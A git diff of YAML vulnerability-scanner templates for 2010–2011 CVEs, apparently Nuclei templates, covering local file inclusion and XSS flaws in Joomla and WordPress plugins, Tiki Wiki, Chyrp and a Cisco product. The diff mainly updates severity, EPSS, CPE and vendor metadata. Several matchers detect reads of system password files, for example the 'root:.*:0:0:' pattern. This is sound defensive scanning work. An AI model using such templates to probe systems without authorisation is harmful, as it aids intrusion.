https://nvd.nist.gov/vuln/detail/CVE-2010-3426 - http://packetstormsecurity.org/1009-exploits/joomlajphone-lfi.txt - http://www.exploit-db.com/exploits/14964 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/61723 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-3426 cwe-id: CWE-22 - tags: lfi,edb,packetstorm,cve,cve2010,joomla + epss-score: 0.00826 + cpe: cpe:2.3:a:4you-studio:com_jphone:1.0:alpha3:*:*:*:*:*:* metadata: max-request: 1 + vendor: 4you-studio + product: com_jphone + tags: lfi,edb,packetstorm,cve,cve2010,joomla http: - method: GET @@ -27,7 +32,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2010/CVE-2010-4231.yaml b/http/cves/2010/CVE-2010-4231.yaml index 49f5c3e5e2..e7f66b9469 100644 --- a/http/cves/2010/CVE-2010-4231.yaml +++ b/http/cves/2010/CVE-2010-4231.yaml @@ -13,12 +13,16 @@ info: remediation: Upgrade to a supported product version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:N/A:N + cvss-score: 7.8 cve-id: CVE-2010-4231 cwe-id: CWE-22 - cvss-score: 7.8 - tags: cve,cve2010,iot,lfi,camera,edb + epss-score: 0.00822 + cpe: cpe:2.3:a:camtron:cmnc-200_firmware:1.102a-008:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: camtron + product: cmnc-200_firmware + tags: cve,cve2010,iot,lfi,camera,edb http: - method: GET diff --git a/http/cves/2010/CVE-2010-4239.yaml b/http/cves/2010/CVE-2010-4239.yaml index f9438ef1e2..284370fe61 100644 --- a/http/cves/2010/CVE-2010-4239.yaml +++ b/http/cves/2010/CVE-2010-4239.yaml @@ -15,11 +15,13 @@ info: cvss-score: 9.8 cve-id: CVE-2010-4239 cwe-id: CWE-20 - cpe: cpe:2.3:a:tiki:tikiwiki_cms\/groupware:*:*:*:*:*:*:*:* - epss-score: 0.00641 - tags: cve,cve2010,tikiwiki,lfi + epss-score: 0.01809 + cpe: cpe:2.3:a:tiki:tikiwiki_cms\/groupware:5.2:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: tiki + product: tikiwiki_cms\/groupware + tags: cve,cve2010,tikiwiki,lfi http: - method: GET diff --git a/http/cves/2010/CVE-2010-4282.yaml b/http/cves/2010/CVE-2010-4282.yaml index e946cde516..171ea60864 100644 --- a/http/cves/2010/CVE-2010-4282.yaml +++ b/http/cves/2010/CVE-2010-4282.yaml @@ -10,15 +10,20 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2010-4282 - http://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/Final%20version%20%28Stable%29/pandorafms_console-3.1_security_patch_13Oct2010.tar.gz/download - http://www.exploit-db.com/exploits/15643 + - http://seclists.org/fulldisclosure/2010/Nov/326 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-4282 cwe-id: CWE-22 - tags: phpshowtime,edb,cve,cve2010,lfi,joomla + epss-score: 0.01214 + cpe: cpe:2.3:a:artica:pandora_fms:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: artica + product: pandora_fms + tags: seclists,phpshowtime,edb,cve,cve2010,lfi,joomla http: - method: GET @@ -27,7 +32,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2010/CVE-2010-4617.yaml b/http/cves/2010/CVE-2010-4617.yaml index 0b88236096..4b5f13491a 100644 --- a/http/cves/2010/CVE-2010-4617.yaml +++ b/http/cves/2010/CVE-2010-4617.yaml @@ -3,21 +3,26 @@ id: CVE-2010-4617 info: name: Joomla! Component JotLoader 2.2.1 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the JotLoader (com_jotloader) component 2.2.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php. reference: - https://www.exploit-db.com/exploits/15791 - https://nvd.nist.gov/vuln/detail/CVE-2010-4617 - http://packetstormsecurity.org/files/view/96812/joomlajotloader-lfi.txt + - https://exchange.xforce.ibmcloud.com/vulnerabilities/64223 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-4617 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb,packetstorm + epss-score: 0.00938 + cpe: cpe:2.3:a:kanich:com_jotloader:2.2.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: kanich + product: com_jotloader + tags: cve,cve2010,joomla,lfi,edb,packetstorm http: - method: GET @@ -26,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2010/CVE-2010-4719.yaml b/http/cves/2010/CVE-2010-4719.yaml index ecd2242147..037daf0dce 100644 --- a/http/cves/2010/CVE-2010-4719.yaml +++ b/http/cves/2010/CVE-2010-4719.yaml @@ -10,15 +10,20 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2010-4719 - http://packetstormsecurity.org/files/view/96751/joomlajradio-lfi.txt - http://www.exploit-db.com/exploits/15749 + - http://www.fxwebdesign.nl/index.php?option=com_content&view=article&id=20&Itemid=56 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-4719 cwe-id: CWE-22 - tags: cve2010,joomla,lfi,edb,packetstorm,cve + epss-score: 0.04503 + cpe: cpe:2.3:a:fxwebdesign:com_jradio:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: fxwebdesign + product: com_jradio + tags: cve2010,joomla,lfi,edb,packetstorm,cve http: - method: GET @@ -27,7 +32,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2010/CVE-2010-4769.yaml b/http/cves/2010/CVE-2010-4769.yaml index f00094c66b..6d78595c9b 100644 --- a/http/cves/2010/CVE-2010-4769.yaml +++ b/http/cves/2010/CVE-2010-4769.yaml @@ -16,9 +16,13 @@ info: cvss-score: 7.5 cve-id: CVE-2010-4769 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.00949 + cpe: cpe:2.3:a:janguo:com_jimtawl:1.0.2:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: janguo + product: com_jimtawl + tags: cve,cve2010,joomla,lfi,edb http: - method: GET @@ -27,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2010/CVE-2010-4977.yaml b/http/cves/2010/CVE-2010-4977.yaml index 58767bdbe9..87e7ffc844 100644 --- a/http/cves/2010/CVE-2010-4977.yaml +++ b/http/cves/2010/CVE-2010-4977.yaml @@ -10,15 +10,20 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2010-4977 - http://www.salvatorefresta.net/files/adv/Canteen%20Joomla%20Component%201.0%20Multiple%20Remote%20Vulnerabilities-04072010.txt - http://packetstormsecurity.org/1007-exploits/joomlacanteen-lfisql.txt + - http://securityreason.com/securityalert/8495 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-4977 cwe-id: CWE-89 - tags: joomla,lfi,edb,packetstorm,cve,cve2010 + epss-score: 0.00239 + cpe: cpe:2.3:a:miniwork:com_canteen:1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: miniwork + product: com_canteen + tags: joomla,lfi,edb,packetstorm,cve,cve2010 http: - method: GET @@ -27,7 +32,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2010/CVE-2010-5028.yaml b/http/cves/2010/CVE-2010-5028.yaml index f57dd08a28..3c600f288a 100644 --- a/http/cves/2010/CVE-2010-5028.yaml +++ b/http/cves/2010/CVE-2010-5028.yaml @@ -9,16 +9,20 @@ info: - https://www.exploit-db.com/exploits/12601 - https://nvd.nist.gov/vuln/detail/CVE-2010-5028 - http://www.vupen.com/english/advisories/2010/1269 - - http://web.archive.org/web/20210126225410/https://www.securityfocus.com/bid/40193/ + - https://exchange.xforce.ibmcloud.com/vulnerabilities/58599 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-5028 cwe-id: CWE-89 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.01171 + cpe: cpe:2.3:a:harmistechnology:com_jejob:1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: harmistechnology + product: com_jejob + tags: cve,cve2010,joomla,lfi,edb http: - method: GET @@ -27,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2010/CVE-2010-5278.yaml b/http/cves/2010/CVE-2010-5278.yaml index 0b0082cad2..e3bacfe9cb 100644 --- a/http/cves/2010/CVE-2010-5278.yaml +++ b/http/cves/2010/CVE-2010-5278.yaml @@ -3,21 +3,26 @@ id: CVE-2010-5278 info: name: MODx manager - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl and possibly earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key parameter when magic_quotes_gpc is disabled. reference: - https://www.exploit-db.com/exploits/34788 - https://nvd.nist.gov/vuln/detail/CVE-2010-5278 - http://packetstormsecurity.org/1009-exploits/modx202pl-lfi.txt - - http://web.archive.org/web/20140803154716/http://secunia.com/advisories/41638/ + - http://modxcms.com/forums/index.php/topic,55104.0.html + - http://modxcms.com/forums/index.php/topic,55105.msg317273.html classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N cvss-score: 4.3 cve-id: CVE-2010-5278 cwe-id: CWE-22 - tags: cve,cve2010,lfi,edb,packetstorm + epss-score: 0.0469 + cpe: cpe:2.3:a:modx:modx_revolution:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: modx + product: modx_revolution + tags: cve,cve2010,lfi,edb,packetstorm http: - method: GET @@ -26,13 +31,14 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - type: word + part: body words: - "bit app support" - "fonts" - "extensions" condition: and - part: body + + - type: status + status: + - 200 diff --git a/http/cves/2010/CVE-2010-5286.yaml b/http/cves/2010/CVE-2010-5286.yaml index 1f730f8070..d1f6dac332 100644 --- a/http/cves/2010/CVE-2010-5286.yaml +++ b/http/cves/2010/CVE-2010-5286.yaml @@ -3,22 +3,25 @@ id: CVE-2010-5286 info: name: Joomla! Component Jstore - 'Controller' Local File Inclusion author: daffainfo - severity: high + severity: critical description: A directory traversal vulnerability in Jstore (com_jstore) component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/34837 - https://nvd.nist.gov/vuln/detail/CVE-2010-5286 - - http://web.archive.org/web/20210123122507/https://www.securityfocus.com/bid/44053/ - http://packetstormsecurity.org/1010-exploits/joomlajstore-lfi.txt remediation: Upgrade to a supported version. classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C + cvss-score: 10 cve-id: CVE-2010-5286 - tags: cve,cve2010,joomla,lfi,edb,packetstorm + cwe-id: CWE-22 + epss-score: 0.04708 + cpe: cpe:2.3:a:joobi:com_jstore:-:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joobi + product: com_jstore + tags: cve,cve2010,joomla,lfi,edb,packetstorm http: - method: GET @@ -27,7 +30,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2011/CVE-2011-0049.yaml b/http/cves/2011/CVE-2011-0049.yaml index 48844d6d78..3a1121c10d 100644 --- a/http/cves/2011/CVE-2011-0049.yaml +++ b/http/cves/2011/CVE-2011-0049.yaml @@ -3,22 +3,27 @@ id: CVE-2011-0049 info: name: Majordomo2 - SMTP/HTTP Directory Traversal author: pikpikcu - severity: high + severity: medium description: A directory traversal vulnerability in the _list_file_get function in lib/Majordomo.pm in Majordomo 2 before 20110131 allows remote attackers to read arbitrary files via .. (dot dot) sequences in the help command, as demonstrated using (1) a crafted email and (2) cgi-bin/mj_wwwusr in the web interface. reference: - https://www.exploit-db.com/exploits/16103 - https://nvd.nist.gov/vuln/detail/CVE-2011-0063 - http://www.kb.cert.org/vuls/id/363726 - https://bug628064.bugzilla.mozilla.org/attachment.cgi?id=506481 + - http://securityreason.com/securityalert/8061 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2011-0049 cwe-id: CWE-22 - tags: cve,cve2011,majordomo2,lfi,edb + epss-score: 0.96615 + cpe: cpe:2.3:a:mj2:majordomo_2:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: mj2 + product: majordomo_2 + tags: cve,cve2011,majordomo2,lfi,edb http: - method: GET @@ -27,7 +32,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2011/CVE-2011-1669.yaml b/http/cves/2011/CVE-2011-1669.yaml index d632708f3b..14b2c92930 100644 --- a/http/cves/2011/CVE-2011-1669.yaml +++ b/http/cves/2011/CVE-2011-1669.yaml @@ -3,22 +3,26 @@ id: CVE-2011-1669 info: name: WP Custom Pages 0.5.0.1 - Local File Inclusion (LFI) author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in wp-download.php in the WP Custom Pages module 0.5.0.1 for WordPress allows remote attackers to read arbitrary files via ..%2F (encoded dot dot) sequences in the url parameter. reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1669 - https://www.exploit-db.com/exploits/17119 - - http://web.archive.org/web/20210121212348/https://www.securityfocus.com/bid/47146/ - http://www.exploit-db.com/exploits/17119 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/66559 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2011-1669 cwe-id: CWE-22 + epss-score: 0.02966 + cpe: cpe:2.3:a:mikoviny:wp_custom_pages:0.5.0.1:*:*:*:*:*:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/wp-custom-pages/" + vendor: mikoviny + product: wp_custom_pages tags: edb,cve,cve2011,wordpress,wp-plugin,lfi http: @@ -28,7 +32,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2011/CVE-2011-2744.yaml b/http/cves/2011/CVE-2011-2744.yaml index 5264b1a9a7..1166adb100 100644 --- a/http/cves/2011/CVE-2011-2744.yaml +++ b/http/cves/2011/CVE-2011-2744.yaml @@ -3,21 +3,26 @@ id: CVE-2011-2744 info: name: Chyrp 2.x - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in Chyrp 2.1 and earlier allows remote attackers to include and execute arbitrary local files via a ..%2F (encoded dot dot slash) in the action parameter to the default URI. reference: - https://www.exploit-db.com/exploits/35945 - http://www.openwall.com/lists/oss-security/2011/07/13/6 - https://nvd.nist.gov/vuln/detail/CVE-2011-2744 - - http://web.archive.org/web/20140723162411/http://secunia.com/advisories/45184/ + - http://securityreason.com/securityalert/8312 + - http://www.ocert.org/advisories/ocert-2011-001.html classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2011-2744 cwe-id: CWE-22 - tags: cve,cve2011,lfi,chyrp,edb + epss-score: 0.01913 + cpe: cpe:2.3:a:chyrp:chyrp:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: chyrp + product: chyrp + tags: cve,cve2011,lfi,chyrp,edb http: - method: GET @@ -26,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2011/CVE-2011-2780.yaml b/http/cves/2011/CVE-2011-2780.yaml index 9f081fbff5..277d5450e7 100644 --- a/http/cves/2011/CVE-2011-2780.yaml +++ b/http/cves/2011/CVE-2011-2780.yaml @@ -3,27 +3,28 @@ id: CVE-2011-2780 info: name: Chyrp 2.x - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in includes/lib/gz.php in Chyrp 2.0 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter, a different vulnerability than CVE-2011-2744. reference: - http://www.justanotherhacker.com/advisories/JAHx113.txt - http://www.openwall.com/lists/oss-security/2011/07/13/5 - http://www.ocert.org/advisories/ocert-2011-001.html - http://www.openwall.com/lists/oss-security/2011/07/13/6 - - http://web.archive.org/web/20210121214023/https://www.securityfocus.com/bid/48672/ - - http://web.archive.org/web/20140723162411/http://secunia.com/advisories/45184/ - http://securityreason.com/securityalert/8312 - https://exchange.xforce.ibmcloud.com/vulnerabilities/68565 - - http://web.archive.org/web/20201207104106/https://www.securityfocus.com/archive/1/518890/100/0/threaded remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2011-2780 cwe-id: CWE-22 - cvss-score: 5.0 - tags: cve,cve2011,lfi,chyrp + epss-score: 0.04076 + cpe: cpe:2.3:a:chyrp:chyrp:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: chyrp + product: chyrp + tags: cve,cve2011,lfi,chyrp http: - method: GET @@ -32,7 +33,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2011/CVE-2011-3315.yaml b/http/cves/2011/CVE-2011-3315.yaml index 3e42638914..8bbde93741 100644 --- a/http/cves/2011/CVE-2011-3315.yaml +++ b/http/cves/2011/CVE-2011-3315.yaml @@ -12,12 +12,16 @@ info: remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:N/A:N + cvss-score: 7.8 cve-id: CVE-2011-3315 cwe-id: CWE-22 - cvss-score: 7.8 - tags: cve,cve2011,lfi,cisco,edb + epss-score: 0.92426 + cpe: cpe:2.3:h:cisco:unified_ip_interactive_voice_response:-:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: cisco + product: unified_ip_interactive_voice_response + tags: cve,cve2011,lfi,cisco,edb http: - method: GET @@ -26,7 +30,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2011/CVE-2011-4336.yaml b/http/cves/2011/CVE-2011-4336.yaml index dfab657b6f..d2ebe41abd 100644 --- a/http/cves/2011/CVE-2011-4336.yaml +++ b/http/cves/2011/CVE-2011-4336.yaml @@ -7,7 +7,6 @@ info: description: Tiki Wiki CMS Groupware 7.0 is vulnerable to cross-site scripting via the GET "ajax" parameter to snarf_ajax.php. reference: - https://nvd.nist.gov/vuln/detail/CVE-2011-4336 - - http://web.archive.org/web/20210328232945/https://www.securityfocus.com/bid/48806/info - https://seclists.org/bugtraq/2011/Nov/140 remediation: Upgrade to a supported version. classification: @@ -15,11 +14,13 @@ info: cvss-score: 6.1 cve-id: CVE-2011-4336 cwe-id: CWE-79 - cpe: cpe:2.3:a:tiki:tikiwiki_cms\/groupware:*:*:*:*:*:*:*:* epss-score: 0.00182 - tags: seclists,cve,cve2011,xss,tikiwiki + cpe: cpe:2.3:a:tiki:tikiwiki_cms\/groupware:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: tiki + product: tikiwiki_cms\/groupware + tags: seclists,cve,cve2011,xss,tikiwiki http: - method: GET @@ -29,15 +30,15 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '' - part: body - - - type: status - status: - - 200 - type: word part: header words: - text/html + + - type: status + status: + - 200 diff --git a/http/cves/2011/CVE-2011-4618.yaml b/http/cves/2011/CVE-2011-4618.yaml index bd223433f3..b6604a3e55 100644 --- a/http/cves/2011/CVE-2011-4618.yaml +++ b/http/cves/2011/CVE-2011-4618.yaml @@ -7,17 +7,23 @@ info: description: A cross-site scripting (XSS) vulnerability in advancedtext.php in Advanced Text Widget plugin before 2.0.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter. reference: - https://nvd.nist.gov/vuln/detail/CVE-2011-4618 - - http://web.archive.org/web/20210121070605/https://www.securityfocus.com/archive/1/520589 - http://wordpress.org/support/topic/wordpress-advanced-text-widget-plugin-cross-site-scripting-vulnerabilities + - http://wordpress.org/extend/plugins/advanced-text-widget/changelog/ + - http://www.openwall.com/lists/oss-security/2011/12/19/6 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/71412 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2011-4618 cwe-id: CWE-79 + epss-score: 0.00746 + cpe: cpe:2.3:a:simplerealtytheme:advanced_text_widget_plugin:*:*:*:*:*:*:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/advanced-text-widget" + vendor: simplerealtytheme + product: advanced_text_widget_plugin tags: cve,cve2011,wordpress,xss,wp-plugin http: diff --git a/http/cves/2011/CVE-2011-4624.yaml b/http/cves/2011/CVE-2011-4624.yaml index 58a25b3bcc..471638e581 100644 --- a/http/cves/2011/CVE-2011-4624.yaml +++ b/http/cves/2011/CVE-2011-4624.yaml @@ -9,15 +9,21 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2011-4624 - http://www.openwall.com/lists/oss-security/2011/12/23/2 - http://plugins.trac.wordpress.org/changeset/469785 + - http://wordpress.org/extend/plugins/flash-album-gallery/changelog/ remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2011-4624 cwe-id: CWE-79 + epss-score: 0.00427 + cpe: cpe:2.3:a:codeasily:grand_flagallery:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/flash-album-gallery" + framework: wordpress + vendor: codeasily + product: grand_flagallery tags: cve,cve2011,wordpress,xss,wp-plugin http: @@ -28,9 +34,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2011/CVE-2011-4804.yaml b/http/cves/2011/CVE-2011-4804.yaml index f6f1ff279d..80ffd86ac8 100644 --- a/http/cves/2011/CVE-2011-4804.yaml +++ b/http/cves/2011/CVE-2011-4804.yaml @@ -3,22 +3,25 @@ id: CVE-2011-4804 info: name: Joomla! Component com_kp - 'Controller' Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the obSuggest (com_obsuggest) component before 1.8 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/36598 - - http://web.archive.org/web/20140802122115/http://secunia.com/advisories/46844/ - - http://web.archive.org/web/20210121214308/https://www.securityfocus.com/bid/48944/ - https://nvd.nist.gov/vuln/detail/CVE-2011-4804 + - http://foobla.com/news/latest/obsuggest-1.8-security-release.html remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2011-4804 cwe-id: CWE-22 - tags: lfi,edb,cve,cve2011,joomla + epss-score: 0.06953 + cpe: cpe:2.3:a:foobla:com_obsuggest:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: foobla + product: com_obsuggest + tags: lfi,edb,cve,cve2011,joomla http: - method: GET @@ -27,7 +30,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2011/CVE-2011-4926.yaml b/http/cves/2011/CVE-2011-4926.yaml index f9f43503e9..7d3019d37b 100644 --- a/http/cves/2011/CVE-2011-4926.yaml +++ b/http/cves/2011/CVE-2011-4926.yaml @@ -10,14 +10,19 @@ info: - https://www.whitesourcesoftware.com/vulnerability-database/CVE-2011-4926 - http://plugins.trac.wordpress.org/changeset?reponame=&new=467338@adminimize&old=466900@adminimize#file5 - http://www.openwall.com/lists/oss-security/2012/01/10/9 + - http://wordpress.org/extend/plugins/adminimize/changelog/ classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2011-4926 cwe-id: CWE-79 + epss-score: 0.0083 + cpe: cpe:2.3:a:bueltge:adminimize:*:*:*:*:*:*:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/adminimize/" + vendor: bueltge + product: adminimize tags: cve,cve2011,wordpress,xss,wp-plugin http: diff --git a/http/cves/2011/CVE-2011-5106.yaml b/http/cves/2011/CVE-2011-5106.yaml index 8e7caf2509..c4bfe1ccc2 100644 --- a/http/cves/2011/CVE-2011-5106.yaml +++ b/http/cves/2011/CVE-2011-5106.yaml @@ -10,14 +10,19 @@ info: - https://wordpress.org/plugins/flexible-custom-post-type/#developers - http://plugins.trac.wordpress.org/changeset?reponame=&new=466252%40flexible-custom-post-type&old=465583%40flexible-custom-post-type - http://wordpress.org/extend/plugins/flexible-custom-post-type/changelog/ + - https://exchange.xforce.ibmcloud.com/vulnerabilities/71415 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2011-5106 cwe-id: CWE-79 + epss-score: 0.00541 + cpe: cpe:2.3:a:fractalia:flexible_custom_post_type:0.1:*:*:*:*:*:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/flexible-custom-post-type/" + vendor: fractalia + product: flexible_custom_post_type tags: cve,cve2011,wordpress,xss,wp-plugin http: @@ -28,9 +33,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2011/CVE-2011-5107.yaml b/http/cves/2011/CVE-2011-5107.yaml index 5ffe67d47c..f3cc844eb4 100644 --- a/http/cves/2011/CVE-2011-5107.yaml +++ b/http/cves/2011/CVE-2011-5107.yaml @@ -7,17 +7,19 @@ info: description: A cross-site scripting vulnerability in post_alert.php in Alert Before Your Post plugin, possibly 0.1.1 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the name parameter. reference: - https://nvd.nist.gov/vuln/detail/CVE-2011-5107 https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-alert-before-your-post-cross-site-scripting-0-1-1/ - - http://web.archive.org/web/20210121220155/https://www.securityfocus.com/bid/50743/ - https://exchange.xforce.ibmcloud.com/vulnerabilities/71413 - - http://web.archive.org/web/20201208110708/https://www.securityfocus.com/archive/1/520590/100/0/threaded classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 cve-id: CVE-2011-5107 cwe-id: CWE-79 - cvss-score: 4.3 + epss-score: 0.0022 + cpe: cpe:2.3:a:wordpress:alert_before_you_post:*:*:*:*:*:*:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/alert-before-your-post" + vendor: wordpress + product: alert_before_you_post tags: cve,cve2011,wordpress,xss,wp-plugin http: @@ -28,9 +30,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2011/CVE-2011-5179.yaml b/http/cves/2011/CVE-2011-5179.yaml index c7112352b5..b05e7b900c 100644 --- a/http/cves/2011/CVE-2011-5179.yaml +++ b/http/cves/2011/CVE-2011-5179.yaml @@ -7,17 +7,19 @@ info: description: A cross-site scripting vulnerability in skysa-official/skysa.php in Skysa App Bar Integration plugin, possibly before 1.04, for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter. reference: - https://nvd.nist.gov/vuln/detail/CVE-2011-5179 - - http://web.archive.org/web/20210615122339/https://www.securityfocus.com/bid/50824 - https://exchange.xforce.ibmcloud.com/vulnerabilities/71486 - - http://web.archive.org/web/20210614205347/https://www.securityfocus.com/archive/1/520662/100/0/threaded classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 cve-id: CVE-2011-5179 cwe-id: CWE-79 - cvss-score: 4.3 + epss-score: 0.0022 + cpe: cpe:2.3:a:skysa:skysa_app_bar_integration_plugin:*:*:*:*:*:*:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/skysa-official/" + vendor: skysa + product: skysa_app_bar_integration_plugin tags: cve,cve2011,wordpress,xss,wp-plugin http: @@ -28,9 +30,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2011/CVE-2011-5181.yaml b/http/cves/2011/CVE-2011-5181.yaml index d3b5022ce3..9d425d5705 100644 --- a/http/cves/2011/CVE-2011-5181.yaml +++ b/http/cves/2011/CVE-2011-5181.yaml @@ -7,16 +7,20 @@ info: description: A cross-site scripting vulnerability in clickdesk.php in ClickDesk Live Support - Live Chat plugin 2.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the cdwidgetid parameter. reference: - https://nvd.nist.gov/vuln/detail/CVE-2011-5181 - - http://web.archive.org/web/20210123155244/https://www.securityfocus.com/bid/50778/ - 